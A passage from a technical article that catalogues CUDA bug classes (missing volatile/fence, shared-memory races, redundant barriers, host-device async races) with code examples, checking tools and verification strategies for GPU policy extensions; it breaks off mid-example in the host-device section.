&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: This bug class fundamentally requires contracts: Extension-local verification cannot see launch parameters. The policy declares preconditions (e.g., "requires gridDim.x == 1" or "requires blockDim.x &amp;gt;= 128"), and the runtime validates at attach/launch time. Policies without explicit requirements are assumed to work with any config.&lt;/p&gt;
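
&lt;p&gt;A contract of this kind could be represented as plain metadata checked on the host before attach or launch. The sketch below is illustrative only: &lt;code&gt;LaunchContract&lt;/code&gt;, its fields, and &lt;code&gt;launch_satisfies&lt;/code&gt; are hypothetical names, not an existing runtime API, and a zero field is assumed to mean "no requirement":&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cuda_runtime.h&amp;gt;   // dim3

// Hypothetical contract metadata declared by a policy; 0 = unconstrained.
struct LaunchContract {
  unsigned int max_grid_x;    // e.g. 1 for "requires gridDim.x == 1"
  unsigned int min_block_x;   // e.g. 128 for "requires blockDim.x &amp;gt;= 128"
};

// Host-side check run at attach/launch time.
inline bool launch_satisfies(const LaunchContract&amp;amp; c, dim3 grid, dim3 block) {
  if (c.max_grid_x != 0 &amp;amp;&amp;amp; grid.x &amp;gt; c.max_grid_x) return false;
  if (block.x &amp;lt; c.min_block_x) return false;   // a minimum of 0 never rejects
  return true;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With a contract of &lt;code&gt;{1, 0}&lt;/code&gt;, a launch with &lt;code&gt;dim3(4)&lt;/code&gt; blocks would be rejected before the policy ever runs, which is the attach-time validation described above.&lt;/p&gt;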

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Wu et al.'s empirical study found real bugs where developers noted kernels "should not be called with more than one block": they suggest adding runtime assertions like &lt;code&gt;assert(gridDim.x == 1)&lt;/code&gt;. Convert such requirements into contract metadata for policy verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Contract-based verification shifts responsibility to policy authors to declare requirements correctly. This is one of the few bug classes where Combined verification is unavoidable, but contracts provide a clean interface without requiring complex joint analysis of kernel + policy.&lt;/p&gt;




&lt;h3&gt;
  
  
  10) Missing Volatile/Fence [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;GPU code often relies on compiler and memory-model subtleties. GKLEE reports a real-world category: forgetting to mark a shared memory variable as &lt;code&gt;volatile&lt;/code&gt;, producing stale reads/writes due to compiler optimization or caching behavior. This is a GPU-flavored instance of memory visibility/ordering bugs that can be hard to reproduce.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;          &lt;span class="c1"&gt;// should sometimes be volatile / properly fenced&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;         &lt;span class="c1"&gt;// may spin if compiler hoists load / visibility issues&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "forgot volatile" as a discovered bug type.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee and other tools' race detection can surface some of these issues when they manifest as data races.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Symbolic exploration (GKLEE-style):&lt;/strong&gt; explore memory access orderings and detect stale read scenarios.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pattern-based linting:&lt;/strong&gt; flag spin-wait loops on shared memory without volatile or fence.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Avoid exposing raw shared/global memory communication to policies; instead provide &lt;strong&gt;helpers with explicit semantics&lt;/strong&gt; (e.g., "atomic increment" or "write once" patterns), and verify policies don't implement ad-hoc synchronization loops. Forbid spin-waiting on shared memory in policy code.&lt;/p&gt;
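
&lt;p&gt;Such helpers could be thin wrappers over CUDA atomics. The following is a sketch under assumptions: the helper names and the &lt;code&gt;POLICY_SLOT_EMPTY&lt;/code&gt; sentinel are hypothetical, and slots are assumed to be initialized to the sentinel before any policy runs:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Hypothetical sentinel marking an unwritten slot.
#define POLICY_SLOT_EMPTY (-1)

// "Atomic increment": safe from any number of threads, no ordering assumed.
__device__ inline void policy_counter_inc(unsigned int* counter) {
  atomicAdd(counter, 1u);
}

// "Write once": the first caller wins; later callers leave the slot unchanged.
// Returns true if this thread's value was stored.
// The value must differ from POLICY_SLOT_EMPTY.
__device__ inline bool policy_write_once(int* slot, int value) {
  return atomicCAS(slot, POLICY_SLOT_EMPTY, value) == POLICY_SLOT_EMPTY;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because policies only ever call helpers like these, the verifier needs to recognize a small fixed set of entry points instead of reasoning about arbitrary loads, stores, and fences.&lt;/p&gt;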

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Banning spin-wait loops and raw shared/global memory communication in policy code rules out volatile/fence bugs by construction. The check is sound for policy code, with high completeness because legitimate polling patterns are rare there.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier bans spin-wait loops (&lt;code&gt;while(flag == 0)&lt;/code&gt;), flag polling patterns, and raw shared/global memory communication. All inter-thread communication must go through atomic helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns). This eliminates volatile/fence bugs by forbidding the patterns that cause them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "forgot volatile" as a discovered bug type via symbolic exploration. Simulee and other race detectors can surface these issues when they manifest as data races.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Independent Thread Scheduling (ITS), introduced with Volta, removes the warp-lockstep execution guarantee, which makes traditional &lt;code&gt;volatile&lt;/code&gt;-based idioms unreliable: code that worked on pre-Volta architectures may race on newer GPUs. The safest approach is to ban ad-hoc synchronization entirely rather than trying to verify memory-model subtleties.&lt;/p&gt;




&lt;h3&gt;
  
  
  11) Shared-Memory Data Races (&lt;code&gt;__shared__&lt;/code&gt;) [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Threads in a block access on-chip shared memory concurrently; missing/incorrect synchronization causes races. This is a classic CUDA bug class (AuCS/Wu).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;   &lt;span class="c1"&gt;// write-write race on s&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUVerify explicitly targets &lt;strong&gt;data-race freedom&lt;/strong&gt; and defines intra-group / inter-group races.(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports finding &lt;strong&gt;races&lt;/strong&gt; (and related deadlocks) via symbolic exploration.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee detects &lt;strong&gt;data race bugs&lt;/strong&gt; in real projects and uses a CUDA-aware notion of race.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al. classify &lt;strong&gt;data race&lt;/strong&gt; under "improper synchronization" as a CUDA-specific root cause.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is a runtime shared-memory hazard detector.(&lt;a href="https://www.shinhwei.com/cuda-repair.pdf" rel="noopener noreferrer"&gt;Shinhwei&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static verifier route (GPUVerify-style):&lt;/strong&gt; enforce "race-free under SIMT" by proving that any two potentially concurrent lanes/threads cannot perform conflicting accesses without proper synchronization.(&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic route (Simulee-style):&lt;/strong&gt; instrument / simulate memory accesses and flag conflicting pairs; good for bug-finding and regression tests.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies have any shared state, require &lt;strong&gt;warp-uniform side effects&lt;/strong&gt; or &lt;strong&gt;single-lane side effects&lt;/strong&gt; (e.g., lane0 updates) plus explicit atomics. A conservative verifier rule is: policy code cannot write shared memory except via restricted helpers that are race-safe (e.g., per-warp aggregation).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Option A – warp-/block-uniform single-writer rules&lt;/strong&gt; (e.g., "only lane 0 updates").&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Option B – atomic-only helpers&lt;/strong&gt; for shared objects.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Option C – per-thread/per-warp sharding&lt;/strong&gt; (each lane updates its own slot).&lt;/li&gt;
&lt;/ul&gt;
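
&lt;p&gt;Options A and C can be combined in a small sketch: each thread writes only its own shared slot, and a single thread publishes the aggregate after a barrier. The kernel name and parameters are hypothetical, and the shared array is assumed to be sized to &lt;code&gt;blockDim.x&lt;/code&gt; ints at launch:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Assumption: launched with blockDim.x * sizeof(int) bytes of dynamic shared memory.
__global__ void count_nonzero(const int* events, int n, int* per_block_total) {
  extern __shared__ int slot[];                    // one slot per thread
  int t = threadIdx.x;
  int i = blockIdx.x * blockDim.x + t;
  slot[t] = (i &amp;lt; n &amp;amp;&amp;amp; events[i] != 0) ? 1 : 0;     // Option C: each thread writes only its own slot
  __syncthreads();                                 // all slots are written before any is read
  if (t == 0) {                                    // Option A: a single writer publishes the result
    int total = 0;
    for (int k = 0; k &amp;lt; (int)blockDim.x; ++k) total += slot[k];
    per_block_total[blockIdx.x] = total;
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;No two threads ever write the same shared or global location here, so a verifier can accept the pattern from index expressions alone.&lt;/p&gt;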

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Shared-memory races depend only on the policy's access patterns and synchronization, providing strong soundness via structural restrictions (per-lane sharding or lane0-only writes eliminate races by construction) with medium completeness (complex shared-memory algorithms rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Three alternative restrictions, all Extension-local (numbered here to keep them distinct from Options A-C above): (1) ban shared-memory writes entirely; (2) require per-lane sharding, where each lane writes only its own slot so no conflicts are possible; (3) require lane0-only writes with atomic helpers. Each makes races impossible by construction without requiring complex GPUVerify-style interleaving proofs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUVerify explicitly targets data-race freedom as a core verification goal and defines intra-group/inter-group races; ESBMC-GPU checks data races via bounded model checking; Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is a runtime shared-memory hazard detector; Simulee detects data race bugs using CUDA-aware race definitions; Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: GPUVerify-style proofs are possible but complex for arbitrary code; structural restrictions are simpler and equally sound for policy use cases. Policies needing complex shared-memory algorithms should use ringbuffers instead, avoiding shared memory entirely.&lt;/p&gt;




&lt;h3&gt;
  
  
  12) Redundant Barriers (unnecessary &lt;code&gt;__syncthreads&lt;/code&gt;) [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A redundant barrier is a performance-pathology class: removing the barrier &lt;strong&gt;does not introduce a race&lt;/strong&gt;, so the barrier was unnecessary overhead.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;             &lt;span class="c1"&gt;// no cross-thread dependence here&lt;/span&gt;
  &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;      &lt;span class="c1"&gt;// redundant&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Wu et al.: defines "redundant barrier function."(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee: detects redundant barrier bugs and reports numbers across projects.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;AuCS: repairs synchronization bugs, including redundant barriers.(&lt;a href="https://www.shinhwei.com/cuda-repair.pdf" rel="noopener noreferrer"&gt;Shinhwei&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GPURepair tooling also exists to insert/remove barriers to fix races and remove unnecessary ones.(&lt;a href="https://github.com/cs17resch01003/gpurepair" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static/dynamic dependence analysis:&lt;/strong&gt; determine whether any cross-thread read-after-write, write-after-read, or write-after-write dependence is protected by the barrier; if none is, the barrier is removable (the Simulee/AuCS angle).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Since barriers are allowed in policy code (with uniform placement enforced by #1), redundant barriers become a performance concern. Use static dependence analysis to detect barriers where no cross-thread data dependence exists between the preceding writes and subsequent reads. The verifier can warn about or reject redundant barriers to enforce &lt;strong&gt;bounded overhead&lt;/strong&gt; as a correctness property, ensuring policies do not introduce unnecessary synchronization cost.&lt;/p&gt;
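
&lt;p&gt;For contrast, here is a minimal sketch of a kernel where the barrier is &lt;em&gt;not&lt;/em&gt; redundant, because each thread reads a shared-memory slot written by a different thread. The kernel name &lt;code&gt;k_needs_barrier&lt;/code&gt; and the neighbor-read pattern are illustrative assumptions, and the sketch assumes a launch with exactly 256 threads per block. A dependence analysis of the kind described above would be expected to keep this barrier while flagging the one in the earlier bug example.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Hypothetical contrast case: assumes blockDim.x == 256.
__global__ void k_needs_barrier(int* out) {
  __shared__ int s[256];
  int t = threadIdx.x;
  s[t] = t;                      // each thread writes its own slot
  __syncthreads();               // required: the read below targets another thread's slot
  out[t] = s[(t + 1) % 256];     // cross-thread read-after-write on shared memory
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The only difference from the redundant case is the index used for the read: once a thread reads a slot it did not write, the barrier carries a real dependence and removing it would introduce a race.&lt;/p&gt;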

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-heuristic. Static dependence analysis can identify barriers that protect no cross-thread memory dependence, flagging them as redundant. This provides good detection coverage for common patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier performs dependence analysis on barrier sites: if no read-after-write or write-after-read across threads is protected by a barrier, the barrier is flagged as redundant and then warned about or rejected. Combined with the policy overhead budget, this ensures barriers are only used when structurally necessary for shared-memory coordination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Simulee detects redundant barriers through evolutionary simulation; Wu et al. define "redundant barrier function" as a key synchronization bug type; GPURepair uses GPUVerify as an oracle to repair data races/barrier divergence and can remove unnecessary barriers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some barriers may appear redundant in isolation but are necessary for correctness under specific scheduling scenarios. Conservative analysis may retain some unnecessary barriers; profiling tools can identify remaining optimization opportunities at the kernel level.&lt;/p&gt;




&lt;h3&gt;
  
  
  13) Host-Device Asynchronous Data Races (API ordering bugs) [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;CUDA exposes async kernel launches/memcpy/events; host code can race with device work if synchronization is missing. This is a major real-world bug source in heterogeneous programs and is &lt;em&gt;not&lt;/em&gt; covered by pure kernel-only verifiers.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;cudaMalloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="n"&gt;kernel&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;grid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;// missing cudaDeviceSynchronize() here&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;h_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;malloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="n"&gt;cudaMemcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;h_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;d_data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="nf"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;cudaMemcpyDeviceToHost&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// race with kernel&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;CuSan is an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer.(&lt;a href="https://github.com/tudasc/cusan" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic detection (CuSan-style):&lt;/strong&gt; instrument host-side CUDA API calls and detect ordering violations at runtime.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies interact with host-visible buffers or involve asynchronous map copies, define a strict &lt;strong&gt;lifetime &amp;amp; ordering contract&lt;/strong&gt; (e.g., "policy writes are only consumed after a guaranteed sync point"). For testing, integrate CuSan into CI for host-side integration tests of the runtime/loader.&lt;/p&gt;
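
&lt;p&gt;The ordering contract above can be sketched on the host side as follows. This is a minimal illustration under stated assumptions, not the runtime's actual loader code: the kernel &lt;code&gt;policy_write&lt;/code&gt;, the buffer names, and the sizes are hypothetical. It shows device writes being copied asynchronously into pinned host memory and the host consuming them only after an explicit &lt;code&gt;cudaStreamSynchronize&lt;/code&gt;.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cstdio&amp;gt;
#include &amp;lt;cuda_runtime.h&amp;gt;

// Hypothetical stand-in for device code that fills a host-visible buffer.
__global__ void policy_write(int* buf, int n) {
  int i = blockIdx.x * blockDim.x + threadIdx.x;
  if (i &amp;lt; n) buf[i] = i;
}

int main() {
  const int n = 1024;
  int* d_buf = nullptr;
  int* h_buf = nullptr;
  cudaStream_t stream;
  cudaStreamCreate(&amp;amp;stream);
  cudaMalloc(&amp;amp;d_buf, n * sizeof(int));
  cudaMallocHost(&amp;amp;h_buf, n * sizeof(int));  // pinned, so the copy is truly asynchronous

  // Both operations are enqueued on the same stream, so the copy runs after the kernel.
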